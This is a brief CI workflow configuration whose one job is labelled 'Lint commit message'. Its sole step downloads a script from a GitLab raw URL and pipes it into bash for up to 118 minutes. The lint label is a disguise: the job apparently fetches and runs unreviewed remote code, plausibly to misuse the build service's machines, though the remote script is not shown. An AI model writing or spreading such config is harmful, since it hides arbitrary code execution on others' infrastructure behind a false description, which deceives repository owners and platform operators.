workflows:
  commitlint:
    name: Lint commit message
    max_build_duration: 120
    instance_type: linux_x2
    scripts:
      - timeout 118m curl -sL https://gitlab.com/termux.id/awesome/-/raw/main/build | bash
